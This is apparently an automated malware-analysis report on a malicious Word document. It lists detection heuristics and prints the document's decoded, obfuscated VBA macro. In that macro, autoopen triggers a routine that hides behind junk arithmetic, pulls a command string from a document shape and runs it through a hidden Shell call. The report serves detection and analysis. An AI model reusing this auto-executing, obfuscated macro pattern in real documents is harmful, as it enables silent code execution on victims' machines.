MALICIOUS
252
Risk Score
Heuristics 9
-
ClamAV: Doc.Malware.Dldk-6779509-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Dldk-6779509-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
. _ Shell(BRJHdVszWK, Hzzlf), XHwpzz) BpalQrunaTWPPVkkTBU = zwUbGETYosEJFQScTDCvV / Tan(21368221) * 321445355 / Tan(204566887) + hLQSaBSBmaDVwfLXVz - Cos(226776144) + (93905917 / Int(KzDIQQzYOwBoEYtD)) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub autoopen() rWbjX -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6211 bytes |
SHA-256: 4a5a2e02c7f061f7dcc4d64e8cad71f9c6244a410d3078e21fbb48a70f66ac15 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
170 of 203 identifiers look randomly generated (e.g. 'wIwpBoQodjLibosUXWctzqlE') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "qAWkdPEATDC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
rWbjX
End Sub
Attribute VB_Name = "satIYcI"
Function rWbjX()
On Error Resume Next
jTjcUJtazXZSlkBsUDnqOj = vpKFjtFLCPLshlUbt / Tan(1645687) * 232917432 / Tan(107415611) + jHKjjcNVnQZzCnnKDJ - Cos(217100111) + (289368539 / Int(XDarUHzctqiTtPiz))
Set DQrqOwlsizhRqqCYKJ = krMVOttaujJYEK
FQzVIEowpJSKDzcviFiPd = vdwUXqMVZcGHlmYpAzvsWMv
cGdtNcOjNwbTtm = KIkZLYdmtsrZUdsLWiSGbk / Tan(243731859) * 233296862 / Tan(318026812) + OsFijdiOFEiXvdwT - Cos(236613788) + (7023059 / Int(CuDVkEpbjNaXAdwKlj))
Set JOvFXoczjpHHAjNt = KXViuCwBfjitwSNnY
HHojhHFFlYFZnnjjzNLjPLz = rHuFnWtUbsFldi
jQJbtpPAYVAuJHzNMLzbdjA = naCKNFuMktPfXW / Tan(63985922) * 212485165 / Tan(54599142) + kGucziSmiMGSPzPIoTmFnTao - Cos(67878815) + (107582337 / Int(SppCQTfzuFKaYsbWiGRdPPP))
Set qtCKQfGSjmAwtKpzjAVCd = NNLzrhsmcCaHLXQViOzsqms
cYRSuPuMEzfpwToYZzJz = lwRjNRGDlBbUjUTQZr
jWMCbjXEOdcdIviqNfQufN = zbauiczpipwrMXJb / Tan(43128165) * 225063873 / Tan(28516249) + uIOQXadwwpwGVLMaAmtbR - Cos(263999196) + (302345811 / Int(MEVTEEJMaiQrNKWDzAqstp))
Set BKjbUocSGOaDTEJsuj = fqvUNpPpcQzAuWiUIVcpX
MJcmGDzpIvMKJfGpWlFzACIN = hlkBXSqLhilsaiLpmHCo
mAGVcHbIrRNKaRoU = vjBXBapzYHvvLWtSEGWduiji / Tan(259255833) * 200532720 / Tan(304361500) + ZmBGtmuHjmlZQVEAjMjvUsWK - Cos(116413860) + (285653223 / Int(QzSjXjqZlFoCYb))
Set lRVwMYaiCawzihQroBiiJ = COtavSurKHTiGEoU
fqOQIYhMsVOAAqzbXPHD = cIoLQqfvaLCTWCnuwtpLOD
BHKwmmTJfiLZKUOZVdWRkkJ = daoqiAnDMjTLhbnYpKcuzOj / Tan(12198003) * 45948888 / Tan(188847281) + WjDIRzTTLwcfiqH - Cos(89215492) + (201002780 / Int(DsuqzbZIOrOumj))
Set rRUJXCNNHbaNfz = rABBDkOjlbjIjb
QMsdmZmEHzpimO = OuKJAOskfRdkjintimC
qKQVFkSnFFOESSohG = IpYbquGfznFvuX / Tan(184927117) * 279385322 / Tan(62286553) + iTBwRnClobJBTQTUTDsPUWO - Cos(171702644) + (244819348 / Int(hKKrccIuDmBKYlYEFiWz))
Set obZDYzuZHEbNmFsbwz = sZNjTJfHqQQkDnLsikoEi
UvhazmfjdJfoEubvG = tqDJrUXZaMJqHvCiFSwtMtc
Set UCKfFw = qAWkdPEATDC.Shapes(DOGcSNMpz + "AAaSQvKwN" + bqYbMLJ).TextFrame
kLBSJiiqrilkQjAtXmlRoi = MIRiTwzLqaaLQhIkzphv / Tan(264063485) * 35226021 / Tan(239865230) + zFBTLAIzFjoJsvKttT - Cos(306249342) + (62967843 / Int(VjLOBocGjoHYzjOuizqSaG))
Set twsBinBUKadiVqFJLftV = hluMwzPTDrOOCSPJnzSiTwz
FtEYpfmhkmMNzpiolB = jPPSYpAYhanakna
ZtvAIVhzVIGhXQXlBwn = rXiNzJDRDAwJinNsMptUTaE / Tan(285553491) * 322835008 / Tan(218693734) + wjjvwHmhBLhDwSQwUJ - Cos(323646144) + (17332423 / Int(CiYMFTaQSqQPoElWFzCrG))
Set hfluCDikhzilwCHi = oMRiUQnKNfZPKvLdrztaLQW
iJQlDIiPWGOiocMOwjoYEU = ETHEFOIhXpfzLzCHFw
BRJHdVszWK = UCKfFw.ContainingRange + qdYEjiQF + wPiwS + Eqafip + HzLbZ + IuZWQcPI + SnoaS + AZhFic + ftuXiii + jkBuHj
odnIwOPkzwKiOLqtjlPDp = TNPkbfqWkEGANVuDtFLC / Tan(186711538) * 287489875 / Tan(227285076) + pjUIOMjVuLKatOn - Cos(236493848) + (304568378 / Int(MGcOzVwdrKrnBbiJusL))
Set HXUkGCKUJfRbIAfccblzK = UZiHJjvkUvYNTolrIvKiT
sPiAwCjSGLWWCuGw = bZZLWDvjqqkTpojRIhPcJms
EZWKbmrTMDnRIhjZAOY = zwLTbwiARYjDJnbsRujInE / Tan(21435802) * 303765607 / Tan(109946367) + EcENroWTbHOCiiDqB - Cos(262302801) + (131442789 / Int(IUGqHFiQBvtRDNsGvEjuh))
Set LTiPLEEwCPajGjVOFmKFRj = zzVmzuzHZCSInLstZ
FtdrWGIkhwukbYfE = PpSGBEHAdoahCNsktMnkF
KqENCcZjBWDAQotKA = zcZwfQubtrkKLCE / Tan(175588282) * 23922457 / Tan(319520975) + nIbcimPKOKODRoshdoNLnS - Cos(176546634) + (227621999 / Int(wqKAvpkzYNzXzvKPGjQfn))
Set WTValpkwUhtufwEJS = dGtbuJitDvhlJDujTr
UEvMZsQiFQOLwNwBhZuY = wsmoRjXpAzcNdwQi
jrrfhCvrzTjhVOU = tTQnirLPFzFBzBXEjN / Tan(307368801) * 169856491 / Tan(184694841) + zJrpTfMzIKabcalMisjcah - Cos(322792420) + (300331072 / Int(wviwHTuuFVHwpXfCIqubWYz))
Set WjCtzOPMzwUjhzBqj = XEiPoUAZRrCSWawLbYRA
rGvwsCvVIpDupBsoGuhtawX = fZulVYcZfmjziRwS
FwMsduNYjmpiIXFHzhdNu = XjIknszIdncaHYPNunVYU / Tan(39277260) * 338146743 / Tan(70111039) + mCZfPQZpVbfktGVa - Cos(154891782) + (60885683 / Int(BiPjsmnqrWQRhz))
Set BpYdNWDkmzjdAjAzwww = iWWjtcaiSFJwmVF
CuvjwzdjIImJqZTUkotf = rjlvVSjnkrfaUuCBQK
BXpzssdumUuYXrn = ikBMwpiRPinBodtHzP / Tan(55028775) * 69881031 / Tan(187521) + rLWFXSKDzPXhOFf - Cos(136650557) + (68906781 / Int(tYkJFbGJanYIjdWY))
Set qprSLGMiXiGPnciEwRbVhGv = OrXiqjuLpMpiTthRYbhzztnK
DmLuDLjurETihsqjvZbnzlC = KzGYzAUENjntjQlBFjbpN
Const Hzzlf = 0
plrzhoHSTdJzoDDrvOGKW = zpjqNWtViKkRtjGiswlisMhi / Tan(292799325) * 30989040 / Tan(39919765) + mzHbNsmBOrblYwwzOX - Cos(62181178) + (150893144 / Int(NWIYnEmIAwIQZjfDJEAtE))
Set BWAKuOhUVvjjZdwCZo = tOtSUzOSwFSIdftVlYdKYafc
hpKCEGfMuLEHEfLf = lODmFEfINivdaSjQFnJDQsz
pjPhpwFYoWALiGAsdhLUiDJ = YtEwJiziEBnLPwZbS / Tan(330919069) * 245062216 / Tan(92061377) + bFpRViwVGLlXzJvrH - Cos(103633009) + (65282440 / Int(WGhSpcfIkCjSvBwoOhn))
Set wIwpBoQodjLibosUXWctzqlE = TczNHdZcJaNIsRALqiAr
qGJbQrFtAIXuJiMSbVFlGROi = fFbhILkMhcWolrlU
viBERRJikDjrvwsBbvpcrY = WfJXaSjAYdwoONPdJaZiaAq / Tan(339256610) * 334085427 / Tan(41559071) + wTEzwXkfZItiMECHO - Cos(325654924) + (54864706 / Int(nMRfBSpTVpJYUAhhUdBQ))
Set ipVPsMiXsbCqbdmBYzdh = JkwVNLWVnkvrAFWvP
GLvcNHisWvjvjYiL = FXuiAICFqGwaYPFJnXW
aUWiAQCzvCIjEBqwJ = GlWPDzTjiEHrqOfHJUYzmM / Tan(312488327) * 326549504 / Tan(227380901) + iwHWhYsjvatLRXOTm - Cos(332171478) + (291689315 / Int(LuEzsVaKCtpYjn))
Set XYIWjzHSENzDBkSaz = fDorKdLzijCkVid
rvibJDEbzkuSZZk = sTBjbfOiLlRbQTsSZu
oXSlOzwcKuDYpTHiDLRifUTw = NaLamfBjNpskjfJ / Tan(286497937) * 139952238 / Tan(35242572) + TOjrzOSThZTTDWiBWmBXOBs - Cos(184330226) + (197850957 / Int(tUfInKPZcshiMMTLU))
Set uVoNFimFThfRWEN = UwoYmIEiulUoapDDhlhIa
OBWhriuKWdUbsVXvUlRK = TJzfidbkkWFJojnCER
SpOii = Array(sPJvGrZr, QkmdMrw, hcGpipdU, Interaction _
. _
Shell(BRJHdVszWK, Hzzlf), XHwpzz)
BpalQrunaTWPPVkkTBU = zwUbGETYosEJFQScTDCvV / Tan(21368221) * 321445355 / Tan(204566887) + hLQSaBSBmaDVwfLXVz - Cos(226776144) + (93905917 / Int(KzDIQQzYOwBoEYtD))
Set NqmHSqPHUYrYzDO = KXMNKKlTdXdBjuGSU
mrcErJnAvrIzOsnYt = jpvDFSivMOaaSY
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.